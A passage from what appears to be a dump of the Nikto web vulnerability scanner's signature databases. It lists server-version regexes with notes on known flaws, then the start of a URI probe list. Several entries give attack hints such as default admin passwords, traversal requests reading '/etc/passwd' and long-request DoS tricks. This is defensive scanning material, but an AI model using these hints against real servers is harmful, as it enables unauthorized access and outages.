admin/admin for id/password.\"\n\"800100\",\"JetAdmin\",\"0\",\"HP Printer\"\n\"800101\",\"Jeus WebContainer\\/([0-3]\\.[0-2]\\..*)\",\"0\",\"JEUS below 3.2.2 is vulnerable to XSS if a nonexistent url is requested, i.e. [victim site]/[javascript].jsp\"\n\"800102\",\"Jigsaw\\/([0-1].*|2\\.([0-1].*|2\\.0))\",\"0\",\"Jigsaw 2.1.0 or below may be vulnerable to XSS if a nonexistent host name is requested, i.e. nosuchhost.domain.com/<script>...\"\n\"800103\",\"Jigsaw\\/2\\.2\\.1\",\"0\",\"Jigsaw 2.1.1 on Windows may be tricked into revealing the system path by requesting /aux two times.\"\n\"800104\",\"JRun\\/([0-3]\\..*|4\\.0)\",\"0\",\"JRun 4.0 and below on IIS is vulnerable to remote buffer overflow with a filename over 4096. http://www.macromedia.com/v1/handlers/index.cfm?ID=23500 and http://www.eeye.com/html/Research/Advisories/index.html\"\n\"800105\",\"JRun\\/3\\.1\",\"0\",\"JRun 3.1 on Windows NT/2000 is vulnerable to remote buffer overflow in the Host header field that can allow attackers to exploit the system.\"\n\"800106\",\"KazaaClient\",\"0\",\"Kazaa may allow sensitive information to be retrieved, http://www.securiteam.com/securitynews/5UP0L2K55W.html\"\n\"800107\",\"LabVIEW\\/(5\\.[1-9]|6\\.[0-1])\",\"0\",\"LabVIEW 5.1.1 to 6.1 is vulnerable to a remote DoS by sending a malformed GET request. This DoS was not attempted.\"\n\"800108\",\"Lasso\\/3\\.6\\.5\",\"0\",\"This version of Blueworld WebData engine is vulnerable to DoS by sending a 1600 character long GET request.\"\n\"800109\",\"LilHTTP\\/2\\.1\",\"0\",\"LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the url.\"\n\"800110\",\"LocalWeb2000\\/([0-1]\\.*|2\\.(0\\.*|1\\.0))\",\"0\",\"LocalWeb2000 2.1.0 and below allow protected files to be retrieved by prepending the request with /./\"\n\"800111\",\"Lotus-Domino\\/([0-3].*|4\\.([0-1].*|2\\.([0-1].*|3)))\",\"0\",\"This version of Lotus-Domino server has had multiple vulnerabilities. See the bugtraq archives for details.\"\n\"800112\",\"Lotus-Domino\\/4\\.[5-6]\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123.\"\n\"800113\",\"Lotus-Domino\\/5\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123.\"\n\"800114\",\"Lotus-Domino\\/5\\.0\\.9\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via requesting DOS devices\"\n\"800115\",\"Lotus-Domino\\/6b.*\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123.\"\n\"800116\",\"Lotus-Domino\\/Release-([0-3].*|4\\.([0-1].*|2\\.([0-1].*|3)))\",\"0\",\"This version of Lotus-Domino server has had multiple vulnerabilities. See the bugtraq archives for details.\"\n\"800117\",\"Lotus-Domino\\/Release-4\\.[5-6]\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123.\"\n\"800118\",\"Lotus-Domino\\/Release-5\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123.\"\n\"800119\",\"Lotus-Domino\\/Release-5\\.0\\.9\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via requesting DOS devices\"\n\"800120\",\"Lotus-Domino\\/Release-6b*\",\"0\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123.\"\n\"800121\",\"machttp\",\"0\",\"http://www.starnine.com/machttp may let you download log files\"\n\"800122\",\"mathopd\",\"0\",\"http://mathop.diva.nl/\"\n\"800123\",\"MegaTime Chart Server\",\"0\",\"Server returns a .png file for all requests, all results should be validated as false-positives are likely.\"\n\"800124\",\"micro-http/\",\"0\",\"Probably a printer (Tektronix?).\"\n\"800125\",\"MiniServ\",\"0\",\"This is the Webmin Unix administrator. It should not be running unless required.\"\n\"800126\",\"mod_auth_mysql\\/((0\\..*)|(1\\.[0-9]$))\",\"0\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800127\",\"mod_auth_oracle\\/0\\.(([0-4].*)|(5\\.[0-1].*))\",\"0\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800128\",\"mod_auth_pgsql_sys\\/0\\.(([0-8]\\..*)|(9\\.[0-4].*))\",\"0\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800129\",\"mod_auth_pgsql\\/0\\.(([0-8]\\..*)|(9\\.[0-5].*))\",\"0\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800130\",\"mod_python\\/(1.*|2\\.([0-6]\\..*|7\\.[0-6]))\",\"0\",\"mod_python 2.7.6 or older may allow attackers to execute functions remotely.\"\n\"800131\",\"mod_security\\/1\\.7([0-1]|RC.*)\",\"0\",\"mod_security 1.7RC1 to 1.7.1 are vulnerable to a buffer overflow, see http://adsystems.com.pl/adg-mod_security171.txt for details. Upgrade to 1.7.2 or higher.\"\n\"800132\",\"mod_ssl\\/(1.*|2\\.([0-7]\\..*|8\\.[0-6]))\",\"0\",\"mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.\"\n\"800133\",\"mod_survey\\/[0-3]\\.0\\.((9|1[0-3])|(14[a-d])|(15\\-pre[0-5]))\",\"0\",\"mod_survey is vulnerable to a remote buffer overflow. It should be upgraded to the latest version.\"\n\"800134\",\"mofet simple\",\"0\",\"Mofet Simple HTTP Server, often an embedded device like a Nortel MIPCD\"\n\"800135\",\"Monkey\\/0\\.([0-5].*|6\\.[0-2]{1})\",\"0\",\"Monkey server is vulnerable to a remote buffer overflow, it should be upgraded at http://monkeyd.sourceforge.net/get_monkey.php?ver=4\"\n\"800136\",\"MS-MFC-HttpSvr/1.0\",\"0\",\"Server and Surfcontrol software has many remote vulnerabilities: CAN-2002-0705, CAN-2002-0706, CAN-2002-0707, CAN-2002-0708, CAN-2002-0709\"\n\"800137\",\"myCIO\",\"0\",\"The McAfee myCIO server provides antivirus updates to clients. This server has had multiple vulnerabilities in the past.\"\n\"800138\",\"Mylo/0\\.([0-1]|2\\.[0-1])\",\"0\",\"mod_mylo may be vulnerable to a remote buffer overflow. Upgrade to the latest version. BID-8287.\"\n\"800139\",\"MyServer 0\\.([0-3]\\..*|4\\.[0-2])\",\"0\",\"MyServer versions lower than 0.5 contain multiple remote vulnerabilities.\"\n\"800140\",\"MyWebServer\\/(0\\.*|1\\.0[0-2])\",\"0\",\"MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a url of approximately 1000 characters.\"\n\"800141\",\"ncsa\",\"0\",\"lower than v1.3 have multiple issues\"\n\"800142\",\"neowebscript\",\"0\",\"Apache plugin to allow TCL use\"\n\"800143\",\"netcloak\",\"0\",\"http://www.maxum.com plugin for webstar\"\n\"800144\",\"netpresenz\",\"0\",\"http://www.stairways.com/netpresenz\"\n\"800145\",\"NetWare\",\"0\",\"Novell Netware server. For recent security alerts please see http://support.novell.com/security-alerts/. For general security information read http://www.cis.ohio-state.edu/hypertext/faq/usenet/netware/security/faq.html (probably out of date)\"\n\"800146\",\"nsl\",\"0\",\"http://www.nsl.net/\"\n\"800147\",\"NULLhttpd\\/0\\.5\\.1\",\"0\",\"NULLhttpd may allow a system DoS if a client says it will send an amount of data, then sends one byte less. This will cause the server to hold that data in memory and wait for the last byte.\"\n\"800148\",\"OmniHTTPd\",\"0\",\"See http://www.omnicron.ab.ca/httpd/\"\n\"800149\",\"OmniHTTPd\\/2\\.0\\.8\",\"0\",\"This version contains a source disclosure vulnerability (append %20 to request). Upgrade to the latest.\"\n\"800150\",\"OmniHTTPd\\/2\\.0\\.9\",\"0\",\"This version contains a remote denial of service if more than 4096 characters are used as the HTTP version in a request. Upgrade to the latest.\"\n\"800151\",\"open-market-secure-webserver\",\"0\",\"http://www.openmarket.com/products/secureweb.html\"\n\"800152\",\"open-market-webserver\",\"0\",\"http://www.openmarket.com/products/webserver.html\"\n\"800153\",\"Oracle Applications One-Hour Install\",\"0\",\"The Oracle Applications One-Hour Install allows remote users to administer the database. It should not be used unless absolutely required.\"\n\"800154\",\"Oracle_Web_Listener\",\"0\",\"The Oracle Web Listener allows remote users to administer the database. It should not be used unless absolutely required.\"\n\"800155\",\"os2httpd\",\"0\",\"http://ftp.netcom.com/pub/kf/kfan/overview.html\"\n\"800156\",\"osu\",\"0\",\"http://kcgl1.eng.ohio-state.edu/www/doc/serverinfo.html\"\n\"800157\",\"PHP\\/([0-3].*|4\\.[0-2].*|4\\.3\\.[0-2])\",\"0\",\"PHP below 4.3.3 may allow local attackers to safe mode and gain access to unauthorized files. BID-8201.\"\n\"800158\",\"PHP\\/[0-3]\\.\",\"0\",\"Old versions of PHP contain multiple buffer overflows and remote exploit problems. Server should be upgraded to the latest version.\"\n\"800159\",\"PHP\\/4\\.0\\.([2-5])\",\"0\",\"PHP 4.1.1 is vulnerable to remote exploits and must be upgraded.\"\n\"800160\",\"PHP\\/4\\.0\\.(1|3pl1)\",\"0\",\"PHP 4.0.1 or 4.0.3pl is vulnerable to remote exploits and should be upgraded. See http://archives.neohapsis.com/archives/vulnwatch/2002-q1/0054.html\"\n\"800161\",\"PHP\\/4\\.0\\.(6|7)(RC2)?\",\"0\",\"PHP 4.06 to 4.07RC3 are vulnerable to remote exploits and must be upgraded.\"\n\"800162\",\"PHP\\/4\\.0\\.[0-3]\",\"0\",\"This version of PHP contains a buffer overflow in the IMAP module. Upgrade to the latest version.\"\n\"800163\",\"PHP\\/4\\.0\\.5\",\"0\",\"This version of PHP allows attackers to override safe mode and obtain the HTTP uid\"\n\"800164\",\"PHP\\/4\\.1\\.1\",\"0\",\"PHP 4.1.1 is vulnerable to remote exploits and must be upgraded.\"\n\"800165\",\"PHP\\/4\\.2\\.[0-1]\",\"0\",\"PHP 4.2.0 and 4.2.1 are vulnerable to local and remote DoS attacks to both PHP and to the web server. Some platforms have remove command execution problems as well.\"\n\"800166\",\"PHP\\/4\\.2\\.0\",\"0\",\"PHP 4.2.0 is vulnerable to exploit via invalid checking of posix_getpwuid and posix_getpwnam. See http://www.securiteam.com for details.\"\n\"800167\",\"phttpd\",\"0\",\"http://www.signum.se/phttpd\"\n\"800168\",\"PI\\/7\\.[0-4]\",\"0\",\"InfronTech WebTide 7.0 to 7.4 allow directory listings by sending a request like '%3f.jsp'.\"\n\"800169\",\"Pi3Web\\/2\\.0\",\"0\",\"Server may crash after sending very long cgi parameters a few times. See http://www.securityoffice.net/\"\n\"800170\",\"plexus\",\"0\",\"http://www.bsdi.com/server/doc/plexus.html\"\n\"800171\",\"powerweb\",\"0\",\"http://www.compusource.co.za/powerweb\"\n\"800172\",\"process\",\"0\",\"http://www.process.com/\"\n\"800173\",\"PWS\",\"0\",\"Personal Web Server. requesting /....../ might give root drive list.\"\n\"800174\",\"pws\\/4\",\"0\",\"May be able to bypass security settings using 8.3 file names. ESB-98.015.\"\n\"800175\",\"RapidLogic\",\"0\",\"Embedded device\"\n\"800176\",\"Resin\\/1\",\"0\",\"Resin web server may allow attackers to read any file on the server by requesting files like '\\..\\..\\file.txt'.\"\n\"800177\",\"Resin\\/2\\.1\\.1\",\"0\",\"Resin 2.1.1 is vulnerable to a remote denial of service by defining large variables when requesting non-existent resources.\"\n\"800178\",\"roxen\",\"0\",\"http://www.roxen.com/\"\n\"800179\",\"rushhour\",\"0\",\"http://www.maxum.com/RushHour\"\n\"800180\",\"sambar\\/(5\\.|6\\.(0|1|2[^.]))\",\"0\",\"This version of Sambar is vulnerable to XSS attacks, http://secunia.com/advisories/15465/\"\n\"800181\",\"sambar\\/(5\\.|6\\.0[^0-9])\",\"0\",\"This version of Sambar contains multiples flaws, http://secunia.com/advisories/9578/\"\n\"800182\",\"sambar\\/5\\.1\",\"0\",\"http://www.sambar.com/ version 5.1 is vulnerable to source viewing by adding a +%00 to cgi requests.\"\n\"800183\",\"Savant\",\"0\",\"Versions of Savant older than 3.0 can be crashed by requesting 'GET /%%% HTTP/1.0'\"\n\"800184\",\"Savant\\/3\\.0\",\"0\",\"Savant 3.0 (Windows) is vulnerable to a remote DoS by sending very long CGI parameters multiple times. Upgrade to a version higher than 3.0.\"\n\"800185\",\"Savant\\/3\\.1\",\"0\",\"Savant 3.1 (Windows) is vulnerable to a DoS by sending a GET request containing a URL of approx. 291 characters or more.\"\n\"800186\",\"ScriptEase\\/0\\.95\",\"0\",\"ScriptEase v0.95 is vulnerable to a DoS if a 2000 character file is requested. See http://securityoffice.net/ for more info.\"\n\"800187\",\"serverseven\",\"0\",\"Win 32 platform (pascal)\"\n\"800188\",\"SetiQueue\\/\",\"0\",\"This is a SETI@Home work-unit queue server, proxy, and web server, http://www.reneris.com/seti/default.asp.\"\n\"800189\",\"Simple, Secure Web Server 1.1\",\"0\",\"Probably a Raptor firewall (which may answer to protect the web server from an invalid request).\"\n\"800190\",\"SimpleWebserver\\/2\\.([0-9]|1\\.[0-2])\",\"0\",\"TelCondex SimpleWebserver 2.12.30210 Build 3285 is vulnerable to a buffer overflow if 704 bytes are sent in the referrer header. Upgrade to 2.13 or higher.\"\n\"800191\",\"SimpleWebserver\\/SimpleWebserver\\/([0-1].*|2\\.(0.*|[0-9]{1}\\..*|(10|11|12)\\..*|13\\.[0-2].*|13\\.310([0-1].*|2[0-7])))\",\"0\",\"TelCondex Simpleserver 2.13.31027 Build 3289 and below allow directory traversal with '/.../' entries.\"\n\"800192\",\"SiteScope Administrator\",\"0\",\"The SiteScope Administrator allows SiteScope configuration if not password protected or if a valid account can be found.\"\n\"800193\",\"Specialix JETSTREAM\",\"0\",\"Probably a printer.\"\n\"800194\",\"spinnaker\",\"0\",\"http://www.telegrafix.com/\"\n\"800195\",\"spry\",\"0\",\"http://wsk.eit.com/\"\n\"800196\",\"Squid\\/2\\.[0-4]\",\"0\",\"The Squid proxy may be vulnerable to an FTP buffer overflow.\"\n\"800197\",\"Squid\\/2\\.[3-4]\\..*(STABLE[1-4]|DEVEL(2|4))\",\"0\",\"The Squid server may be vulnerable to a PUT request DoS. Also may have SNMP/FTP/HTCP vuls if running.\"\n\"800198\",\"Statistics Server\",\"0\",\"Statistics Server versions lower than 5.03 are vulnerable to a remote command execution flaw.\"\n\"800199\",\"Storage\",\"0\",\"Try to login with 'admin' or 'monitor'\"\n\"800200\",\"StorageTek\",\"0\",\"Try to login with 'admin' or 'monitor'\"\n\"800201\",\"Stronghold\",\"0\",\"May be a Big IP (load balancer) admin interface.\"\n\"800202\",\"Sun_WebServer\",\"0\",\"Solaris Management Console (SMC)\"\n\"800203\",\"Teamtrack\",\"0\",\"May allow ../../../ directory listing. See www.wiretrip.net for RFP9904\"\n\"800204\",\"telefinder\",\"0\",\"http://bbs.spiderisland.com/\"\n\"800205\",\"thttpd\",\"0\",\"www.acme.com/software/thttpd. Below v2.03 lets reading of system files by adding // like //etc/passwd. 2.04 has a buffer overflow in 'If-Modified-Since' header.\"\n\"800206\",\"thttpd/2.20b\",\"0\",\"Server is vulnerable to cross site scripting in error messages.\"\n\"800207\",\"tivo-httpd\",\"0\",\"Tivo server allows Tivo DVRS and comps to download video from the Tivo to a desktop. User ID is 'tivo' and pass is the Media Access Key (MAK)\"\n\"800208\",\"Tivo\",\"0\",\"TiVo Calypso Server allows TiVo DVRs to talk to computers to download music and video via an HTTP web server on port 8101.\"\n\"800209\",\"tme_10_netview_vs\",\"0\",\"Tivoli web manager\"\n\"800210\",\"Ultraseek\",\"0\",\"The Ultraseek server has had multiple buffer overflows and cross site scripting vuls. Make sure the latest version is being run.\"\n\"800211\",\"viking\",\"0\",\"http://www.robtex.com/viking/\"\n\"800212\",\"VisualRoute\",\"0\",\"VisualRoute web servers allow remote users to perform traceroutes to third parties while remaining anonymous. This should not be run without proper protection.\"\n\"800213\",\"vm\\:webserver\",\"0\",\"http://www.vm.sterling.com/\"\n\"800214\",\"vqserver\",\"0\",\"version 1.9.9 and below have remote file read vulnerability, http://www.vqsoft.com/\"\n\"800215\",\"w4\",\"0\",\"http://130.89.224.16/\"\n\"800216\",\"web commander\",\"0\",\"http://www.luckman.com/wc/webcom.html\"\n\"800217\",\"web server 4d\",\"0\",\"http://www.mdg.com/\"\n\"800218\",\"Web_Server_4D\\/3\\.5\\.3\",\"0\",\"Vulnerable to a DoS and a directory traversal problem. See http://www.securityoffice.net/\"\n\"800219\",\"Web4All\\/1\\.2\\.8\",\"0\",\"Web Server 4 Everyone may be vulnerable to a remote DoS if 2000 characters are requested.\"\n\"800220\",\"Web4Everyone\\/1\\.2\\.8\",\"0\",\"Web Server 4 Everyone may be vulnerable to a remote DoS if 2000 characters are requested.\"\n\"800221\",\"webdisk\",\"0\",\"http://www.ararat.com/\"\n\"800222\",\"webforone\",\"0\",\"http://www.resnova.com/webforone\"\n\"800223\",\"WebLogic.*6\\.0.*(SP(1.*|2 [^R].*))\",\"0\",\"Weblogic may be vulnerable to multiple remote problems. See http://www.s21sec.com/en/avisos/s21sec-011-en.txt and http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA03-28.jsp.\"\n\"800224\",\"WebLogic.*6\\.1.*(SP([1-3].*|[^4-9].*))\",\"0\",\"Weblogic may be vulnerable to multiple remote problems. See http://www.s21sec.com/en/avisos/s21sec-011-en.txt and http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA03-28.jsp.\"\n\"800225\",\"WebLogic.*7\\.0.(\\.0\\.1)?.*(SP[^2-9])?\",\"0\",\"Weblogic may be vulnerable to multiple remote problems. See http://www.s21sec.com/en/avisos/s21sec-011-en.txt and http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA03-28.jsp.\"\n\"800226\",\"Weblogic\\/6\\.1\",\"0\",\"WebLogic 6.1 SP2 for Win2k may have multiple problems. See http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?highlight=advisoriesnotifications&path=components/dev2dev/resourcelibrary/advisoriesnotifications/securityadvisoriesbea020303.htm for details.\"\n\"800227\",\"webquest\",\"0\",\"http://www.questar.com/\"\n\"800228\",\"webshare\",\"0\",\"http://www.beyond-software.com/products/eweb/webshare/webshare.html\"\n\"800229\",\"websitepro\",\"0\",\"http://website.ora.com/\"\n\"800230\",\"WebSitePro\\/2\\.[0-4]\",\"0\",\"Versions of WebSitePro lower than 2.5 have multiple buffer overflows. Upgrade to 2.5 or higher. CAN-2000-0623.\"\n\"800231\",\"WebSitePro\\/3\\.1\\.11\\.0\",\"0\",\"WebSitePro 3.1.11.0 can disclose source code by requesting the 8.3 file name instead of the full file name.\"\n\"800232\",\"Websphere\\/4\\.0\\.3\",\"0\",\"This server may have a DoS if large HTTP headers are received. Install PQ62144, http://www-1.ibm.com/support/docview.wss?rs=180&context=SSEQTP&q=PQ62144&uid=swg24001610\"\n\"800233\",\"webstar\",\"0\",\"http://www.starnine.com/webstar may let you download log files\"\n\"800234\",\"WebZerver\",\"0\",\"May be DiscZerver\"\n\"800235\",\"whostmgr\",\"0\",\"This is a web host and system manager. It should not be running unless required, as it allows system/server administration.\"\n\"800236\",\"wildcat\",\"0\",\"http://www.santronics.com/\"\n\"800237\",\"Worldgroup\\/3\\.20\",\"0\",\"WoldGroup 3.20 is vulnerable to a remote root exploit, it should be upgraded.\"\n\"800238\",\"Xedia\",\"0\",\"Lucent access points may be vulnerable to a DoS if 4000 characters are requested. See http://www.phenoelit.de/stuff/Lucent_Xedia.txt for info.\"\n\"800239\",\"Xeneo\\/(2\\.\\1\\.[0-9]|[0-1]\\..*)\",\"0\",\"May be able to DoS the server by requesting '%A', see http://www.secunia.com/secunia_security_advisories/ .\"\n\"800240\",\"Xeneo\\/(2\\.\\1\\.0\\.0|2\\.0\\.759\\.6)\",\"0\",\"May be able to DoS the server by requesting '%', see http://www.idefense.com/advisory/11.04.02b.txt .\"\n\"800241\",\"xerox\",\"0\",\"Probably a printer.\"\n\"800242\",\"xitami\",\"0\",\"Open Source Windows server may be vulnerable to a buffer overflow. Check for the latest version from Xitami.com.\"\n\"800243\",\"xitami\\/(2.[0-4]*|1\\.*)\",\"0\",\"This version of Xitami from http://www.imatix.com/html/xitami/ may disclose script source if any error occurs. Upgrade to a newer version.\"\n\"800244\",\"zbserver\\/\",\"0\",\"May be vulnerale to a DoS (version 'Pro 1.50-r13'), see http://www.securityoffice.net/. http://www.zbserver.com/\"\n\"800245\",\"zeus\",\"0\",\"http://www.zeus.co.uk/ see RFP9905 (wiretrip.net) for more info\"\n\"800246\",\"Zeus\\/3\\.1\",\"0\",\"Bug allows source of CGI to be viewed. Upgrade to 3.3.5a or higher\"\n\"800247\",\"Zeus\\/3\\.2\",\"0\",\"Bug allows source of CGI to be viewed. Upgrade to 3.3.5a or higher\"\n\"800248\",\"Zeus\\/3\\.3\",\"0\",\"Bug allows source of CGI to be viewed. Upgrade to 3.3.5a or higher\"\n\"800249\",\"Zope\\/((0|1).*|2\\.((0\\..*)|(1\\..*)|(2\\..*)|(3\\.[0-2])))\",\"0\",\"Zope servers below 2.3.3 contain multiple remote configuration problems and vulnerabilities. Upgrade to the latest version.\"\n\"800250\",\"ZyXEL-RomPager\",\"0\",\"Probably a Netgear SoHo Router (RT-314 or similar), most likely vulnerable to CSS.\"\n\"800251\",\"Netscape-Enterprise\\/4.\",\"0\",\"Netscape-Enterprise 4.x was made End of Life by Sun in December  2002. http://www.sun.com/software/products/web_srvr/lifecycle.xml\"\n\"800252\",\"CERN\\/3\",\"0\",\"CERN 3.0A has not been updated since July, 1996 and likely has a few flaws.\"\n\"800253\",\"Agent-ListenServer-HttpSvr\\/1\\.0\",\"0\",\"McAfee ePolicy Orchestra Agent. This may reveal information about anti-virus and software update schedules.\"\n\"800254\",\"HP System Management Homepage\\/([0-2]|3\\.0\\.(0|1\\.([0-6]|7[0-2])))\",\"54608\",\"HP System Management Homepage version contains multiple vulnerabilities.\"\n\"800255\",\"cp-sw-server\",\"0\",\"This is a web hosting manager. It should not be running unless required, as it allows web server administration.\"\n\"800256\",\"cpservd\",\"0\",\"This is a web hosting manager. It should not be running unless required, as it allows web server administration.\"\n\"800257\",\"mod_speling\",\"0\",\"mod_speling can reveal otherwise hidden files via 'misspelled' file names.\"\n\"800259\",\"HttpFileServer\\shttpd\",\"0\",\"This server has been known to host malware, see: https://pronto185.com/blog/2014/03/06/slightly-interesting-find-from-sshranking/\"\n\"800260\",\"Jetty\\(9\\.2\\.[3-8].*\",\"118744\",\"Jetty 9.2.3 to 9.2.8 contains a flaw that is triggered when handling 400 errors in HTTP responses. This may allow a remote attacker to gain access to potentially sensitive information in the memory (CVE-2015-2080).\"\n\"800261\",\"PAW Server\",\"0\",\"PAW Server default admin id/password is admin/paw. It's worth a try.\"\n\"800262\",\"PHP\\/([345]\\.\\d|7\\.0)\",\"0\",\"PHP 3/4/5 and 7.0 are End of Life products without support.\"\n\"800263\",\"PHP\\/7\\.1\",\"0\",\"PHP 7.1 is End of Life and only receives security updates. It will be unsupported after 2019-12-01.\"\n"
  },
  {
    "path": "nikto/program/databases/db_tests",
    "content": "#VERSION,2.021\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n#\n# Tuning options (field 3):\n# 0 - File Upload\n# 1 - Interesting File / Seen in logs\n# 2 - Misconfiguration / Default File\n# 3 - Information Disclosure\n# 4 - Injection (XSS/Script/HTML)\n# 5 - Remote File Retrieval - Inside Web Root\n# 6 - Denial of Service\n# 7 - Remote File Retrieval - Server Wide\n# 8 - Command Execution / Remote Shell\n# 9 - SQL Injection\n# a - Authentication Bypass\n# b - Software Identification\n# c - Remote source inclusion\n# d - WebService\n# e - Administrative Console\n# f - XML Injection\n#\n# Field order:\n# Test-ID, OSVDB-ID, Tuning Type, URI, HTTP Method, Match 1, Match 1 Or, Match 1 And, Fail 1, Fail 2, Summary, HTTP Data, Headers\n#\n#######################################################################\n\"000001\",\"0\",\"b\",\"/TiVoConnect?Command=QueryServer\",\"GET\",\"Calypso Server\",\"\",\"\",\"\",\"\",\"The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media.\",\"\",\"\"\n\"000002\",\"0\",\"b\",\"/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes\",\"GET\",\"TiVoContainer\",\"\",\"\",\"\",\"\",\"TiVo client service is running and may allow download of mp3 or jpg files.\",\"\",\"\"\n\"000003\",\"0\",\"1234576890ab\",\"@CGIDIRScart32.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"request cart32.exe/cart32clientlist\",\"\",\"\"\n\"000004\",\"0\",\"1234576890ab\",\"@CGIDIRSclassified.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Check Phrack 55 for info by RFP\",\"\",\"\"\n\"000005\",\"0\",\"1234576890ab\",\"@CGIDIRSdownload.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"v1 by Matt Wright; check info in Phrack 55 by RFP\",\"\",\"\"\n\"000006\",\"0\",\"1234576890ab\",\"@CGIDIRSflexform.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Check Phrack 55 for info by RFP, allows to append info to writable files.\",\"\",\"\"\n\"000007\",\"0\",\"1234576890ab\",\"@CGIDIRSflexform\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Check Phrack 55 for info by RFP, allows to append info to writable files.\",\"\",\"\"\n\"000008\",\"0\",\"1234576890ab\",\"@CGIDIRSlwgate.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7\",\"\",\"\"\n\"000009\",\"0\",\"1234576890ab\",\"@CGIDIRSLWGate.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7\",\"\",\"\"\n\"000010\",\"0\",\"1234576890ab\",\"@CGIDIRSlwgate\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Check Phrack 55 for info by RFP\",\"\",\"\"\n\"000011\",\"0\",\"1234576890ab\",\"@CGIDIRSLWGate\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Check Phrack 55 for info by RFP\",\"\",\"\"\n\"000012\",\"0\",\"1234576890ab\",\"@CGIDIRSperlshop.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"v3.1 by ARPAnet.com; check info in Phrack 55 by RFP\",\"\",\"\"\n\"000013\",\"0\",\"1234576890ab\",\"/cfappman/index.cfm\",\"GET\",\"200\",\"\",\"not found\",\"\",\"\",\"susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm\",\"\",\"\"\n\"000014\",\"0\",\"1234576890ab\",\"/cfdocs/examples/cvbeans/beaninfo.cfm\",\"GET\",\"200\",\"\",\"not found\",\"\",\"\",\"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm\",\"\",\"\"\n\"000015\",\"0\",\"1234576890ab\",\"/cfdocs/examples/parks/detail.cfm\",\"GET\",\"200\",\"\",\"not found\",\"\",\"\",\"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm\",\"\",\"\"\n\"000016\",\"0\",\"1234576890ab\",\"/kboard/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php\",\"\",\"\"\n\"000017\",\"0\",\"1234576890ab\",\"/lists/admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist\",\"\",\"\"\n\"000018\",\"0\",\"1234576890ab\",\"/splashAdmin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.\",\"\",\"\"\n\"000019\",\"0\",\"1234576890ab\",\"/ssdefs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Siteseed pre 1.4.2 has 'major' security problems.\",\"\",\"\"\n\"000020\",\"0\",\"1234576890ab\",\"/sshome/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Siteseed pre 1.4.2 has 'major' security problems.\",\"\",\"\"\n\"000021\",\"0\",\"1234576890ab\",\"/tiki/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin\",\"\",\"\"\n\"000022\",\"0\",\"1234576890ab\",\"/tiki/tiki-install.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin\",\"\",\"\"\n\"000023\",\"0\",\"1234576890ab\",\"/scripts/samples/details.idc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"See RFP 9901; www.wiretrip.net\",\"\",\"\"\n\"000024\",\"396\",\"6\",\"/_vti_bin/shtml.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Attackers 